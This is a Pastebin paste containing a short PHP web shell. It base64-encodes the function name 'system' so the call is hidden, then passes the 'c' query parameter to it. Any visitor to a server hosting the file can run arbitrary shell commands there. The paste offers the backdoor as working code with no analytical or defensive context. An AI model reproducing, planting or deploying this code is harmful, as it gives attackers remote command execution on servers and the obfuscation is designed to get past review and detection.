Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- class rce {
- public function exec($code){
- return null;
- }
- }
- $c = new rce();
- $d = base64_decode("c3lzdGVt");
- echo "<pre>";
- $e = $c->exec($d($_GET["c"]));
- echo "<pre/>";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment